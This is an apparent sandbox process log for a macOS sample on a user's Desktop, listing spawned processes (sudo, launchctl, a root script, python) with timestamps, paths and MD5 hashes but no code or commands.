Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/sbin/chown
File size:23312 bytes
MD5 hash:cc600d309dc91e491f52c51e0b1821ec

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/launchctl
File size:124656 bytes
MD5 hash:17fad4b994d600d0a5b6bc02b55c2c80

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:07:37:02
Start date:03/07/2018
Path:/var/root/script.sh
File size:274 bytes
MD5 hash:e26e3fe247d795ea2d21f3eb4e070871

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/python
File size:66880 bytes
MD5 hash:2464fd41f7cf319d0e5c61a7643af77e

General

Start time:07:37:03
Start date:03/07/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:07:38:18
Start date:03/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:07:38:18
Start date:03/07/2018
Path:/bin/sleep
File size:18080 bytes
MD5 hash:cd4336ba78cb5b78f50d0f935036c332

General

Start time:07:38:23
Start date:03/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:07:38:23
Start date:03/07/2018
Path:/usr/bin/python
File size:66880 bytes
MD5 hash:2464fd41f7cf319d0e5c61a7643af77e

General

Start time:07:38:23
Start date:03/07/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0